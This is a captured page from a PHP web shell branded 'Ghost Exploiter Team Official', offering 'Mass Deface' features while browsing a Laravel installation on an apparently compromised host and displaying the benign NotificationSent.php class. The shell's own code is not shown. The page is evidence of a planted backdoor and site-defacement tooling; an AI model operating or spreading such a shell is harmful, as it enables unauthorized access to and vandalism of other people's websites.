webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Notifications
/
Events
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
BroadcastNotificationCr
...
3.404KB
edt
ren
NotificationFailed.php
1.11KB
edt
ren
NotificationSending.php
0.934KB
edt
ren
NotificationSent.php
1.108KB
edt
ren
<?php namespace Illuminate\Notifications\Events; use Illuminate\Bus\Queueable; use Illuminate\Queue\SerializesModels; class NotificationSent { use Queueable, SerializesModels; /** * The notifiable entity who received the notification. * * @var mixed */ public $notifiable; /** * The notification instance. * * @var \Illuminate\Notifications\Notification */ public $notification; /** * The channel name. * * @var string */ public $channel; /** * The channel's response. * * @var mixed */ public $response; /** * Create a new event instance. * * @param mixed $notifiable * @param \Illuminate\Notifications\Notification $notification * @param string $channel * @param mixed $response * @return void */ public function __construct($notifiable, $notification, $channel, $response = null) { $this->channel = $channel; $this->response = $response; $this->notifiable = $notifiable; $this->notification = $notification; } }
<=Back
Liking